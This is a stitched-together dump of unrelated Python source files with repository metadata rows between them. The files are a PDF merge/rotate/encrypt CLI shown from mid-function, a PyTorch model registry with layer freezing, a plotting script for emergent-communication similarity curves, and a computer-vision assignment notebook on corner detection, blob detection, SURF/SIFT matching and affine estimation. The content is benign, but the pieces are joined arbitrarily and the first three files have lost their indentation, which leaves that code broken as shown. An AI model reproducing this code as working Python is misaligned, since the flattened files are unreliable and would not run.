print("{} must end with '.pdf' extension".format(file_name))
return 1
pos = -1
if len(x) > 1:
pos = int(x[1])
pages = []
if len(x) > 2:
pages = list(range_to_page_indices(x[2]))
print("- Merging file: {} {}".format(file_name, "at position {}".format(pos) if pos > -1 else ""))
merge_files.append((file_name, pos, pages))
rotate_pages = {}
if input_parameters.rotate_pages:
for rot in input_parameters.rotate_pages:
x = rot[0].split(':')
if len(x) < 2:
print("{} must be in the format RANGE:ANGLE".format(x))
return 1
pages = list(range_to_page_indices(x[0]))
angle = int(x[1])
if abs(angle) % 90 != 0:
print("Angle must be a multiple of 90")
return 1
print("- Rotating page/s {} by {}".format(pages, "{} degrees clockwise".format(angle) if angle > 0 else "{} degrees counter-clockwise".format(abs(angle))))
for page in pages:
rotate_pages[page] = angle
remove_range = None
if input_parameters.remove_pages:
if merge_files:
print("Removing pages is incompatible with merging pages")
return 1
remove_range = list(range_to_page_indices(input_parameters.remove_pages))
page_range = None
if input_parameters.pages:
if merge_files:
print("Selecting pages is incompatible with merging pages")
return 1
if remove_range:
print("Selecting pages is incompatible with removing pages")
return 1
page_range = list(range_to_page_indices(input_parameters.pages))
if not name.endswith(".pdf"):
print("File must end with '.pdf' extension")
return 1
if not output_name.endswith(".pdf"):
output_name += ".pdf"
reader = PdfReader(name)
if should_decrypt:
if reader.is_encrypted:
reader = decrypt(reader, decryption_key)
input_file_stats = os.stat(name)
print('''Input file stats:
Size in bytes: {}
Pages: {}
'''.format(input_file_stats.st_size, len(reader.pages)))
writer = PdfWriter()
for index, page in enumerate(reader.pages):
if page_range and index not in page_range:
continue
if remove_range and index in remove_range:
continue
if should_compress:
page = compress_page(page)
if rotate_pages and index in rotate_pages.keys():
page = rotate(page, rotate_pages[index])
writer.add_page(page)
for file, pos, pages in merge_files:
writer = merge(writer, file, pos, pages)
if should_remove_images:
writer = remove_images(writer)
if should_encrypt:
writer = encrypt(writer, encryption_key)
with open("{}".format(output_name), "wb") as f:
writer.write(f)
output_file_stats = os.stat(output_name)
    print('''Output file stats:
Size in bytes: {}
Pages: {}
'''.format(output_file_stats.st_size, len(writer.pages)))
if input_parameters.search_term:
content = " ".join(page.extract_text().strip() for page in reader.pages)
content = ' '.join(content.split())
print('\n'.join(search(input_parameters.search_term,content)))
if __name__ == "__main__":
sys.exit(main()) | dwelman-xebia/innoday-python-pdf-tool | pdftool/main.py | main.py | py | 7,387 | python | en | code | 0 | github-code | 13 |
28080517480 | import pruning
import torch
import os
from foundations import paths
from foundations.hparams import ModelHparams
from foundations.step import Step
from models import cifar_vgg, mnist_mlp, imagenet_resnet, cifar_pytorch_resnet, tinyimagenet_resnet
from models import bn_initializers, initializers
registered_models = [mnist_mlp.Model, cifar_vgg.Model, imagenet_resnet.Model,
cifar_pytorch_resnet.Model, tinyimagenet_resnet.Model]
def get(model_hparams: ModelHparams, outputs=None, pruning_strategy = None):
"""Get the model for the corresponding hyperparameters."""
# Select the initializer.
if hasattr(initializers, model_hparams.model_init):
initializer = getattr(initializers, model_hparams.model_init)
else:
raise ValueError('No initializer: {}'.format(model_hparams.model_init))
# Select the BatchNorm initializer.
if hasattr(bn_initializers, model_hparams.batchnorm_init):
bn_initializer = getattr(bn_initializers, model_hparams.batchnorm_init)
else:
raise ValueError('No batchnorm initializer: {}'.format(model_hparams.batchnorm_init))
# Create the overall initializer function.
def init_fn(w):
initializer(w)
bn_initializer(w)
# Select the model.
model = None
for registered_model in registered_models:
if registered_model.is_valid_model_name(model_hparams.model_name):
model = registered_model.get_model_from_name(model_hparams.model_name, init_fn, outputs)
break
if model is None:
raise ValueError('No such model: {}'.format(model_hparams.model_name))
# Set prunable layers type
model.prunable_layer_type = 'BN' if pruning_strategy == 'network_slimming' else 'default'
# Freeze various subsets of the network.
bn_names = []
for k, v in model.named_modules():
if isinstance(v, torch.nn.BatchNorm2d):
bn_names += [k + '.weight', k + '.bias']
if model_hparams.others_frozen_exceptions:
others_exception_names = model_hparams.others_frozen_exceptions.split(',')
for name in others_exception_names:
if name not in model.state_dict():
raise ValueError(f'Invalid name to except: {name}')
else:
others_exception_names = []
for k, v in model.named_parameters():
if k in bn_names and model_hparams.batchnorm_frozen:
v.requires_grad = False
elif k in model.output_layer_names and model_hparams.output_frozen:
v.requires_grad = False
elif k not in bn_names and k not in model.output_layer_names and model_hparams.others_frozen:
if k in others_exception_names: continue
v.requires_grad = False
return model
def load(save_location: str, save_step: Step, model_hparams, outputs=None, pruning_strategy = None):
state_dict = torch.load(paths.model(save_location, save_step))
model = get(model_hparams, outputs, pruning_strategy)
model.load_state_dict(state_dict)
return model
def exists(save_location, save_step):
return os.path.exists(paths.model(save_location, save_step))
def get_default_hparams(model_name):
"""Get the default hyperparameters for a particular model."""
for registered_model in registered_models:
if registered_model.is_valid_model_name(model_name):
params = registered_model.default_hparams()
params.model_hparams.model_name = model_name
return params
raise ValueError('No such model: {}'.format(model_name))
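# Hypothetical usage sketch (the model name is illustrative; valid names depend on
# the registered model classes):
#   hparams = get_default_hparams('cifar_resnet_20')
#   model = get(hparams.model_hparams, outputs=10)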
| he-zh/sparse-double-descent | models/registry.py | registry.py | py | 3,562 | python | en | code | 13 | github-code | 13 |
4192811681 | import torch
import matplotlib.pyplot as plt
from math import inf
import numpy as np
from utils.conf import args
def load_training_status(file_path:str) -> tuple:
print('loading '+file_path+'...')
checkpoint = torch.load(file_path, map_location=torch.device('cpu'))
records = checkpoint['records']
print(checkpoint['args'])
print('done')
return records
def EMA_smooth(l:list, alpha=0.05) -> list:
if len(l) == 0:
return l
new_l = [l[0]]
for i in l:
new_l.append(alpha * i + (1-alpha) * new_l[-1])
return new_l
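# Note: the output is one element longer than the input since the seed l[0] is kept;
# e.g. EMA_smooth([0, 1, 1]) -> [0, 0.0, 0.05, 0.0975]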
def plot_training_into_1_figure(chk_points_paths:list, label_list:list) -> None:
for idx, file_path in enumerate(chk_points_paths):
records = load_training_status(file_path)
t_sim = records['training_spkh_lish_sim'][:] # records['training_sim']
t_sim = EMA_smooth(t_sim)
linewidth = 1.0
plt.plot(t_sim, label=label_list[idx], linewidth=linewidth)
plt.legend()
plt.xlabel('Number of Iterations')
plt.title('Topological Similarity Between Speaker Hidden and Listener Hidden')
plt.yticks(np.arange(0, 1, step=0.05))
plt.grid()
plt.show()
def main():
chk_point_path_list = [
'./params/compare_spkh_lish_sim/gen_game.tar',
'./params/compare_spkh_lish_sim/refer_game.tar'
]
label_list = [
'referential game',
'reconstruction game'
]
plot_training_into_1_figure(chk_point_path_list, label_list)
if __name__ == '__main__':
main()
| Shawn-Guo-CN/EmergentNumerals | analysis/compare_refer_gen_game.py | compare_refer_gen_game.py | py | 1,534 | python | en | code | 4 | github-code | 13 |
22205603026 | #!/usr/bin/env python
# coding: utf-8
# ## CSC420 Assignment 2
# ### Brendan Neal | 1001160236 | nealbre1
# Imports and some helper functions
# In[1]:
import numpy as np
from scipy import spatial
import cv2 as cv
import math
from matplotlib import pyplot as plot
# Make the plot a certain size
plot.rcParams["figure.figsize"] = [8, 6]
# Shows an image, and saves it if a filename is given
def display_image(img, file_name=None):
flt_img = img.astype(float)
img_max, img_min = np.max(flt_img), np.min(flt_img)
norm_img = (((flt_img - img_min) / (img_max - img_min)) * 255).astype(np.uint8)
if len(img.shape) == 2:
plot.imshow(norm_img, cmap='gray')
elif (len(img.shape) == 3):
plot.imshow(cv.cvtColor(norm_img, cv.COLOR_BGR2RGB))
plot.show()
if file_name:
cv.imwrite(file_name, norm_img)
def show_scatter_plot(inputs, function, x_label, y_label):
"""
Displays the scatter-plot of repeatedly applying function to the elements of inputs.
X axis = input
Y axis = function(input)
"""
inps = list(inputs)
plot.scatter(inps, [function(x) for x in inps])
plot.xlabel(x_label)
plot.ylabel(y_label)
plot.show()
# #### Question 1a: Harris/Brown Corner Metric Implementation
# In[2]:
def derivative(float_img, kernel_size, x_degree, y_degree):
return cv.Sobel(
float_img, cv.CV_64F,
x_degree, y_degree,
ksize=kernel_size
)
def gauss_blur(float_img, sigma=1):
return cv.GaussianBlur(
float_img,
ksize=(0, 0),
sigmaX=sigma, sigmaY=sigma
)
def corner_components(float_img):
blurred = gauss_blur(float_img)
i_x = derivative(blurred, 5, 1, 0)
i_y = derivative(blurred, 5, 0, 1)
i_x2 = gauss_blur(i_x ** 2)
i_y2 = gauss_blur(i_y ** 2)
i_xy = gauss_blur(i_x * i_y)
det = (i_x2 * i_y2) - (i_xy ** 2)
trace = i_x2 + i_y2
return det, trace
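# det and trace above are the determinant and trace of the Gaussian-weighted
# second-moment matrix M = [[Ix^2, Ix*Iy], [Ix*Iy, Iy^2]], from which both the
# Harris and Brown corner scores are built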
def harris_corners(float_img, k):
assert (0.04 <= k <= 0.06)
det, trace = corner_components(float_img)
return det - (k * (trace ** 2))
def brown_corners(float_img):
# Ignore division by 0 errors
with np.errstate(divide='ignore', invalid='ignore'):
det, trace = corner_components(float_img)
divided = det / trace
# Dividing by 0 produces NAN, so ignore these pixels by setting them to maximum
    return np.nan_to_num(divided, nan=np.nanmax(divided))
# Applying the above code to *building.jpg*
# In[3]:
building = cv.imread("building.jpg", cv.IMREAD_GRAYSCALE).astype(np.float32)
display_image(building)
harris_building = harris_corners(building, 0.05)
display_image(harris_building, "q1A-harris-output.jpg")
brown_building = brown_corners(building)
display_image(brown_building, "q1A-brown-output.jpg")
# The second and third images above are the Harris (R) and Brown (Harmonic Mean) corner metrics, respectively.
#
# They have been displayed in a normalized fashion (0 corresponds to original minimum pixel value, 255 to original maximum pixel value).
#
# We can see that the Harris response metric produced an image with much higher variance than the Brown counterpart - most of the Harris response is gray. This is because the distribution of pixels in the Harris response seems to cover both positive and negative values, whereas the Brown response is mostly positive.
# #### Question 1b: Non-Maximal Suppression
# In[4]:
# Copied from A1
def patch_view(arr, patch_h, patch_w):
"""(numpy.array, int, int) -> numpy.array
Creates a 4D, read-only view of some 2D numpy array as a 2D array of 2D patches.
There are (arr_height x arr_width) patches and each patch is of size (patch_h, patch_w)
:param arr: some 2D numpy array
:param patch_h: desired height for patches
:param patch_w: desired width for patches
:return: 4D array of (patch_h x patch_w) patches
"""
assert len(arr.shape) == 2
# Numpy stride code examples (magic):
# https://stackoverflow.com/questions/16774148/
# https://github.com/keras-team/keras/issues/2983
# New height and width are now going to be in terms of
# number of overlapping patches we can fit into arr
new_h, new_w = np.array(arr.shape) - np.array([patch_h, patch_w]) + 1
    # Make arr contiguous up front so that the strides passed to as_strided
    # describe the array we actually hand it
    arr = np.ascontiguousarray(arr)
    return np.lib.stride_tricks.as_strided(
        arr,
        shape=(new_h, new_w, patch_h, patch_w),
        strides=arr.strides + arr.strides,
        writeable=False
    )
def circular_mask(radius):
"""(int -> numpy.array)
Creates a 2D-boolean mask of a circle with radius radius.
Returns a 2D, square array with side length size 2*radius + 1
"""
diameter = 2*radius + 1
center_x = center_y = radius
x, y = np.indices((diameter, diameter))
distances = ((center_x - x) ** 2 + (center_y - y) ** 2) ** 0.5
return (distances <= radius)
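# e.g. circular_mask(1) is a 3x3 array where only the 4-connected cross is True
# (the corner cells sit at distance sqrt(2) > 1)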
def zero_padded(arr, thickness):
return np.pad(
arr, ((thickness, thickness), (thickness, thickness)),
mode='constant', constant_values=0
)
def non_maximal_suppression(float_img, radius, circle):
# Radius should be odd
# (e.g. radius k -> patch of size (2k + 1)x(2k + 1))
patch_size = (radius * 2) + 1
# Pad the given image so the number of patches == number of pixels
padding = patch_size // 2
padded = zero_padded(float_img, padding)
# 2D Array of 2D patches
patches = patch_view(padded, patch_size, patch_size)
# Create mask for suppression in neighbourhood
# (when taking maximum of patch, ignore pixels outside the mask)
mask = circular_mask(radius) if circle else np.ones((patch_size, patch_size))
patch_maxes = np.empty(float_img.shape)
patch_maxes[:, :] = np.amax(patches[:, :] * mask, axis=(2, 3))
# Suppress pixels that are NOT the maximum within their patches
ret = np.copy(float_img)
ret[ret != patch_maxes] = 0
return ret
# In[5]:
for radius in [2, 4, 8]:
display_image(
non_maximal_suppression(brown_building, radius, circle=True),
f"q1B-nonmax-suppression-output-r={radius}.jpg"
)
# Note: Please see the raw image files attached in the submission. The PDF doesn't seem to treat isolated pixels very nicely.
#
# We can see that as r increases, the amount of detected detail decreases. This difference can be seen clearly between the 2 and 8-radius images. Particular areas of interest where the fine details show up most clearly are:
#
# Building on the left-hand side, in particular the decorative window frames
#
# Corners of the windows belonging to the distant tower on the right
#
# Corners of the window-frames on the center building
#
# The granularity of the high-response regions is inversely proportional to the radius of non-maximal suppression. This is because a larger radius causes the algorithm to inspect a wider neighbourhood. Therefore, the chance that the center pixel is a maximum is much lower, so it has a higher chance of being suppressed. For pixels in the same neighbourhood, pixels that correspond to fine details are more likely to be suppressed as they will have smaller response values.
# #### Question 1c: Blob Detection via Laplacian
# In[6]:
def gauss_pyramid(float_img, sigma = 1.6):
"""
Yields a sequence of tuples of the following form:
(img, scale)
img : i-th halving of float_img
scale : 2 ** i
"""
# Figure out how many times the image can be halved
shortest_side = min(float_img.shape)
num_reductions = int(np.log2(shortest_side)) - 1
cur_image = float_img
for i in range(num_reductions):
scale = 2 ** i
yield cur_image, scale
# Move onto a blurred and halved version of the image
cur_image = cv.pyrDown(cur_image)
def gauss_octave(float_img, length, sigma = 1.6):
"""
Yields a sequence of length-many tuples of the following form:
(img, blur_width)
img: i-th gaussian blurring of float_img
blur_width: sigma of the gaussian blur
"""
scaling_factor = 2 ** (1 / length)
for i in range(length):
blur_width = sigma * (scaling_factor ** i)
yield gauss_blur(float_img, blur_width), blur_width
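# With this scheme, blur widths are sigma * 2**(i / length), so the octave spans
# one doubling of blur width; e.g. length=5, sigma=1.6 gives 1.6 ... 1.6 * 2**(4/5)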
def laplace_octave(float_img, octave_length, sigma = 1.6):
"""
Yields a sequence of length-many tuples of the following form:
(img, blur_width)
img: absolute laplacian of the i-th gaussian blurring of float_img
blur_width: sigma of the gaussian blur
"""
for img, blur_width in gauss_octave(float_img, octave_length, sigma):
laplace = np.abs(cv.Laplacian(img, ddepth=cv.CV_32F, ksize=5, scale=1))
yield laplace, blur_width
def laplace_maxima_suppression(cur_img, neighbours):
"""
Suppresses points (sets to 0) iff they are NOT maxima across:
Their surrounding 3x3 patch
The corresponding 3x3 patches in neighbours
"""
# 0-Padding of thickness 1 for each image
cur_pad = zero_padded(cur_img, 1)
neighs_padded = [zero_padded(x, 1) for x in neighbours]
# 3x3 patch views of each image
cur_patches = patch_view(cur_pad, 3, 3)
neigh_patches = [patch_view(x, 3, 3) for x in neighs_padded]
# Max of each patch, then across all patches
cur_max = np.amax(cur_patches, axis=(2, 3))
neigh_maxes = [np.amax(x, axis=(2, 3)) for x in neigh_patches]
all_max = np.amax(np.dstack([cur_max] + neigh_maxes), axis=2)
# True iff pixel of cur_img is a maximum across
# local neighbourhood and neighbouring neighbourhoods
is_cur_max = np.equal(cur_img, all_max)
# Suppress the pixels that don't count
return cur_img * is_cur_max
def laplace_octave_suppression(octave):
"""
Performs laplace_maxima_suppression over the following groups of images in octave:
(first, [second])
(intermediate, [intermediate - 1, intermediate + 1])
(penultimate, [last])
Returns a list of the results.
"""
# Check first against second
ret = [
laplace_maxima_suppression(octave[0], [octave[1]])
]
# Check middle sections against up and down neighbours
for i in range(len(octave) - 2):
(down, cur, up) = octave[i:i+3]
ret += [laplace_maxima_suppression(cur, [down, up])]
# Check last against second last
ret += [laplace_maxima_suppression(octave[-1], [octave[-2]])]
return ret
def laplace_octave_maxima(float_img, octave_length, sigma = 1.6):
"""
Return the responses, coordinates and blur widths of the pixels
that are local maxima within octave/scale.
Returns a numpy array of form [[response, y, x, blur width]]
"""
# Store and unpack the laplace octave
tups = list(laplace_octave(float_img, octave_length, sigma))
laplaces = [x[0] for x in tups]
blur_widths = np.array([x[1] for x in tups])
# Suppress the maxima of the octave
suppressed = laplace_octave_suppression(laplaces)
# For each vector which index has the highest response?
stacked = np.dstack(suppressed)
max_response_ind = np.argmax(stacked, axis=2)
# Determine maximum response and corresponding blur widths
max_responses = np.amax(stacked, axis=2)
pixel_blur_widths = blur_widths[max_response_ind]
# Get the blur width and response of each maxima
maxima_coords = np.nonzero(max_responses)
blurs_of_maxima = pixel_blur_widths[maxima_coords]
responses = max_responses[maxima_coords]
# Merge the arrays together
return np.array([responses, *maxima_coords, blurs_of_maxima]).transpose()
def laplace_maxima(float_img, octave_length, sigma = 1.6):
"""
Return the responses, SCALED coordinates and blur widths of the pixels
that are maxima across all octaves.
Returns a numpy array of form [[response, y, x, blur width]]
"""
arrays = []
for img, scale in gauss_pyramid(float_img, sigma):
oct_max = laplace_octave_maxima(img, octave_length, sigma)
oct_max[:, 1:] *= scale
arrays += [oct_max]
return np.concatenate(arrays)
def show_laplace_interest_pts(float_img, octave_length, sigma = 1.6, percentile = 80):
# Create color channel image
ret = np.dstack([np.copy(float_img)] * 3)
maxima = laplace_maxima(float_img, octave_length, sigma)
threshold = np.percentile(maxima[:, 0], percentile)
for (response, y, x, blur_width) in maxima:
if response > threshold:
radius = blur_width * (2 ** 0.5)
cv.circle(ret, (int(x), int(y)), int(radius), (0, 255, 0), 2)
return ret
# In[7]:
synthetic = cv.imread("synthetic.png", cv.IMREAD_GRAYSCALE).astype(np.float32)
display_image(synthetic)
# Run algorithm, show interest points with 97th percentile response or higher
synth_interest_pts = show_laplace_interest_pts(
synthetic,
octave_length = 5,
sigma = 7,
percentile = 97
)
display_image(synth_interest_pts, "q1c-output.jpg")
# #### Question 1d: Other Feature Detector (SURF)
#
# More info:
# https://en.wikipedia.org/wiki/Speeded_up_robust_features
#
# SURF stands for "Speeded Up Robust Features".
#
# SURF follows the same high-level steps as SIFT. However, the implementation of some steps is different. Most of the changes are made so that SURF performs much faster than SIFT.
#
# Some differences in implementation (arranged by high-level step):
#
# * **Scale Invariant Feature Detection**: find image interest points across many scales (reduce the search space for matching images)
# * SIFT: Use Difference-of-Gaussians across an image pyramid to approximate Laplacian. Extrema are interest points.
# * SURF: Use determinants of Hessian Matrices across increasing blur-filter sizes to determine extrema
# * Speedup 1: use a box-filter (simple sum) instead of Gaussian filter
# * Speedup 2: box-filter computation can be sped up using integral of image (sums of patches)
#
#
# * **Interest Point Orientation**: determine orientation of interest points (for rotational invariance)
# * SIFT: Use arc-tangent, gradients of gaussians and neighbourhood historgrams
# * SURF: Use Haar wavelet responses in interest point neighbourhoods
#
#
# * **Descriptor Generation**: encode enough information about an interest point into a high-dimensional vector such that distance metrics can be used for robust matching
# * SIFT: Use histograms of gradients (oriented relative to a dominant gradient direction) to compute the vector
# * SURF: Use Gaussian weighting instead of histogram, and smaller/less neighbourhoods to produce lower-dimensional vector
# In[8]:
def draw_surf_keypoints(img, hessian_threshold):
surf = cv.xfeatures2d.SURF_create(hessian_threshold)
keypoints, descriptors = surf.detectAndCompute(img, None)
ret = cv.drawKeypoints(img, keypoints, None, (0, 255, 0), 4)
return ret
building_color = cv.imread("building.jpg")
synth_color = cv.imread("synthetic.png")
# Picking fairly high Haar thresholds to limit number of keypoints drawn
surf_synth = draw_surf_keypoints(synth_color, 15000)
display_image(surf_synth, "q1d-surf-synth-output.jpg")
surf_building = draw_surf_keypoints(building_color, 3000)
display_image(surf_building, "q1d-surf-building-output.jpg")
# #### Question 2: SIFT Matching
#
# Note: I'm going to be using the SIFT feature extractor provided with opencv_contrib.
# #### Question 2a: SIFT Keypoint / Feature Extraction
# In[9]:
def extract_sift_data(img):
sift = cv.xfeatures2d.SIFT_create(1000)
keypoints, descriptors = sift.detectAndCompute(img, None)
return keypoints, descriptors
def draw_sift_keypoints(img, keypoints):
return cv.drawKeypoints(img, keypoints, None, (0, 255, 0), 4)
book = cv.imread("book.jpeg")
book_kp, book_desc = extract_sift_data(book)
display_image(draw_sift_keypoints(book, book_kp), "q2a-book-output.jpg")
find_book = cv.imread("findBook.png")
find_book_kp, find_book_desc = extract_sift_data(find_book)
display_image(draw_sift_keypoints(find_book, find_book_kp), "q2a-find-book-output.jpg")
# #### Question 2b: Matching SIFT Keypoints
# In[10]:
def match_sift_descriptors(left, right, threshold):
"""
Returns a 2D array of form [[i, j, distance]], where
i - index of a vector in left
j - index of the closest matching vector in right
distance - integer distance between vectors i, j
Results are sorted by the distance of the vector pairs.
"""
# Return empty if either left or right is empty
left_empty = (left is None) or (len(left) == 0)
right_empty = (right is None) or (len(right) == 0)
if left_empty or right_empty:
return np.empty((0, 3)).astype(int)
# [i, j]-th is euclidean distance between left[i], right[j]
euc_dists = spatial.distance.cdist(left, right, 'euclidean')
# [i, j]-th is the index of the j-th closest right-vector to left[i]
sort_inds = np.argsort(euc_dists, axis=1)
# top 2 matches are represented by first and second columns of above
closest, closest2 = sort_inds[:, 0], sort_inds[:, 1]
    # Compute distance ratios between (left, first-closest right) vs. (left, second-closest right)
left_inds = np.arange(left.shape[0])
dist_ratios = euc_dists[left_inds, closest] / euc_dists[left_inds, closest2]
# Suppress where distance ratio is above some threshold
suppressed = dist_ratios * (dist_ratios < threshold)
# Get indices where suppression didn't happen
left_inds = np.nonzero(suppressed)[0]
right_inds = closest[left_inds]
# Pair the above indices together, determine distance of pair
pairs = np.stack((left_inds, right_inds)).transpose()
pair_dists = euc_dists[pairs[:, 0], pairs[:, 1]]
sorted_dist_inds = np.argsort(pair_dists)
sorted_pairs = pairs[sorted_dist_inds]
sorted_dists = pair_dists[sorted_dist_inds].reshape((sorted_pairs.shape[0], 1))
return np.hstack((sorted_pairs, sorted_dists)).astype(int)
# Note: instructions are very unclear, so I'm plotting the number of matches overall
# https://q.utoronto.ca/courses/51548/discussion_topics/113030
show_scatter_plot(
(x / 10 for x in range(1, 11)),
lambda x : match_sift_descriptors(book_desc, find_book_desc, x).shape[0],
"Threshold",
"Number of Matches"
)
# *Note: the instructions are unclear as to what threshold qualifies as the "best"*
#
# The best ratio seems to be around 0.8 (this is what SIFT uses).
#
# A threshold of 0.8 seems to be an inflection point in the number of generated matches.
#
# Beyond 0.8 it's likely that many bad matches will start appearing: the second-closest descriptor is no longer far enough from the query descriptor for the closest one to be confidently treated as the true match (after accounting for noise).
#
# Intuition - if the top two players scored within 20% of each other in a noisy (performance-wise) contest, we can't really be sure whether the first player is actually better.
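#
# Worked example: with nearest and second-nearest distances of 10 and 12, the
# ratio is 10/12 ≈ 0.83 > 0.8, so the match is considered ambiguous and is
# rejected; with distances 10 and 20, the ratio is 0.5 < 0.8, so it is kept.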
# #### Question 2c / Question 2d: Solving for Affine Transformation & Visualization
# The minimum $k$ needed to solve the affine transformation is 3.
#
# Recall equation from lecture 8B:
# $$P_{2k\times6} A_{6\times1} = P'_{2k\times1} \implies A = P^{-1}P'$$
#
# In order for $P$ to be invertible, it must be square.
# $$P_{m \times m} = P_{2k\times 6} \implies 2k = 6 \implies k = 3$$
#
# Also note that when the system is over-determined, i.e.
# $$2k > 6 \implies k > 3,$$ the pseudo-inverse of $P$ yields the least-squares (approximate) solution.
#
# In[11]:
# Left : Source, Right : Target
def keypoints_to_coords(keypoints):
"""
Converts keypoints into a numpy array of form [[x, y]]
"""
return np.array([kp.pt for kp in keypoints])
def affine_left_matrix(coords):
"""
Input: array of form [[x, y]]
Returns a 2D array of form
[
...
[x, y, 0, 0, 1, 0]
[0, 0, x, y, 0, 1]
...
]
"""
# Need to have 6 columns, and twice as many rows
ret_dims = (coords.shape[0] * 2, 6)
ret = np.empty(ret_dims, coords.dtype)
# Use numpy indexing
i = np.arange(coords.shape[0])
# Even Rows: [x, y, 0, 0, 1, 0]
ret[2*i, :2] = coords[i]
ret[2*i, 2:] = [0, 0, 1, 0]
# Odd Rows: [0, 0, x, y, 0, 1]
ret[2*i + 1, :2] = [0, 0]
ret[2*i + 1, 2:4] = coords[i]
ret[2*i + 1, 4:] = [0, 1]
return ret
def affine_right_matrix(coords):
"""
Returns a 2D array of form
[
[x]
[y]
...
]
"""
# Return array needs to be twice as long
ret = np.empty(coords.shape[0] * 2, dtype = coords.dtype)
# Use numpy indexing
i = np.arange(coords.shape[0])
# Even Rows = x
ret[2*i] = coords[i, 0]
# Odd Rows = y
ret[2*i + 1] = coords[i, 1]
return ret
def solve_affine_transform(left_kp_coords, right_kp_coords, k):
assert k >= 3
top_left, top_right = left_kp_coords[:k], right_kp_coords[:k]
assert top_left.shape == top_right.shape
# Using equation from lecture 8B: PA = P' -> A = P_inv * P'
P = affine_left_matrix(top_left)
P_prime = affine_right_matrix(top_right)
# Compute inverse using moore-penrose pseudo inverse
P_inv = np.linalg.pinv(P)
# Approximation of affine transformation vector (a, b, c, d, e, f)
(a, b, c, d, e, f) = np.matmul(P_inv, P_prime).flatten()
# The affine transformation matrix
return np.array(
[[a, b, e],
[c, d, f]]
)
def affine_transform(coords, transform_matrix):
"""
Computes the affine transform of coords (form [[x, y]]) with transform_matrix.
"""
# Add ones onto the end of every row, then transpose the matrix (columns are [x, y, 1])
num_pts, num_dims = coords.shape
with_ones = np.ones((num_pts, num_dims + 1))
with_ones[:, :-1] = coords
with_ones = with_ones.transpose()
# Array of form [[x...], [y...]]
transformed = np.matmul(transform_matrix, with_ones)
return transformed.transpose()
def draw_polygon(img, polygon_clockwise, color, thickness):
"""
Draws the polygon whose corner points are specified in clockwise order
in polygon_clockwise (array of form [[x, y]])
onto a copy of img.
"""
ret = np.copy(img)
num_corners = polygon_clockwise.shape[0]
for i in range(num_corners):
# Figure out which points to connect together
left_ind, right_ind = (i % num_corners), ((i + 1) % num_corners)
left, right = polygon_clockwise[left_ind], polygon_clockwise[right_ind]
# Draw a line between them (cv needs int tuples)
left_tup, right_tup = tuple(left.astype(int)), tuple(right.astype(int))
cv.line(ret, left_tup, right_tup, color, thickness)
return ret
def visualize_affine_transform(polygon_clockwise, img, transform_matrix):
"""
Visualizes the affine transformation of transform_matrix by drawing a
quadrilateral (corner points specified by quadr, an array of form [[x, y]], clockwise order)
onto a copy of right_img.
"""
# Transform the given polygon's corner points into new space
new_poly = affine_transform(polygon_clockwise, transform_matrix)
# Return the polygon drawn on the image
return draw_polygon(img, new_poly, (0, 255, 0), 3)
sift_matches = match_sift_descriptors(book_desc, find_book_desc, 0.8)
book_kp_coords = keypoints_to_coords(book_kp)[sift_matches[:, 0]]
find_book_kp_coords = keypoints_to_coords(find_book_kp)[sift_matches[:, 1]]
# Determine four corners of the book (clockwise order)
book_h, book_w = book.shape[:2]
book_quadr = np.array([
[0, 0], [book_w, 0],
[book_w, book_h], [0, book_h]
])
for k in range(3, 10, 2):
print("Affine matrix and transform visualization using top {} matches:".format(k))
matrix = solve_affine_transform(book_kp_coords, find_book_kp_coords, k)
print(matrix)
visualized = visualize_affine_transform(book_quadr, find_book, matrix)
display_image(visualized, "q2d-output-top-k={}.jpg".format(k))
print("")
# #### Question 2e : Color SIFT Matching
# In[12]:
def gray_to_color(gray_img, num_colors):
assert len(gray_img.shape) == 2
return np.dstack([gray_img] * num_colors)
def visualize_sift_color_matches(left_img, right_img, threshold, k):
"""
Algorithm (assume number of color channels identical)
1) Acquire SIFT keypoints and descriptors across each color channel
2) Match SIFT descriptors WITHIN color channels
Produce an array of form [[i, j, dist, channel]], where
i - index of the keypoint/descriptor in left_img
j - index of the keypoint/descriptor in right_img
dist - euclidean distance between i,j descriptors
channel - color channel the match occurred in
3) Merge the matches (across all channels) together, sort by distance and
take top k matches (lowest distance)
4) Use the tagged matches' keypoint coordinates
in the affine transformation calculation
Reasoning / Intuition: if a match is "strong" enough to make it
into the top-k, across all color channels, it's probably a match
"""
# Images should have same shape and number of color channels
assert [len(left_img.shape), len(right_img.shape)] == [3, 3]
assert left_img.shape[-1] == right_img.shape[-1]
# Grab number of colors (should be last element of shape)
num_colors = left_img.shape[-1]
# OpenCV's SIFT only works on color images for some reason, so
# replicate each color channel 3 times to make it pseudo-RGB
left_channels = (gray_to_color(left_img[..., i], num_colors) for i in range(num_colors))
right_channels = (gray_to_color(right_img[..., i], num_colors) for i in range(num_colors))
# Find keypoints and descriptors for left and right images
left_kps, left_descs = zip(*(extract_sift_data(channel) for channel in left_channels))
right_kps, right_descs = zip(*(extract_sift_data(channel) for channel in right_channels))
# Get matches within each channel, then tag with color channel number in last column
channel_matches = (
match_sift_descriptors(left_descs[i], right_descs[i], threshold)
for i in range(num_colors)
)
tagged_matches = (
np.hstack((matches, color * np.ones((matches.shape[0], 1)))).astype(int)
for (color, matches) in enumerate(channel_matches)
)
# Merge matches together, sort by distance (3rd element), then take top k
merged_matches = np.vstack([x for x in tagged_matches])
sorted_matches = merged_matches[np.argsort(merged_matches[:, 2])]
top_k_matches = sorted_matches[:k]
# Grab the points associated with each match
left_match_kp, right_match_kp = [], []
for (i, j, dist, channel) in top_k_matches:
left_match_kp += [left_kps[channel][i]]
right_match_kp += [right_kps[channel][j]]
# Convert keypoints into coordinates, then compute affine matrix
left_match_kp_coords = keypoints_to_coords(left_match_kp)
right_match_kp_coords = keypoints_to_coords(right_match_kp)
affine_matrix = solve_affine_transform(left_match_kp_coords, right_match_kp_coords, k)
# Determine four corners of the left (clockwise order)
left_h, left_w = left_img.shape[:2]
left_quadr = np.array([
[0, 0], [left_w, 0],
[left_w, left_h], [0, left_h]
])
# Visualize the affine transformation
return visualize_affine_transform(left_quadr, right_img, affine_matrix)
color_template = cv.imread("colourTemplate.png")
color_search = cv.imread("colourSearch.png")
display_image(visualize_sift_color_matches(color_template, color_search, 0.8, 7), "q2e-output.jpg")
# #### Question 3: RANSAC
#
# Recall: the minimum number of trials $S$ needed in order for RANSAC to produce a fitting model is
#
# $$S(P, p, k) =\frac{log(1-P)}{log(1-p^k)}$$
#
# Where:
#
# $P$ is the probability that the trials produce a fitting model
#
# $p$ is the proportion of inliers (number of inliers / number of points)
#
# $k$ is the number of points used to fit the model
# In[13]:
def S(P, p, k):
return math.log(1 - P) / math.log(1 - (p ** k))
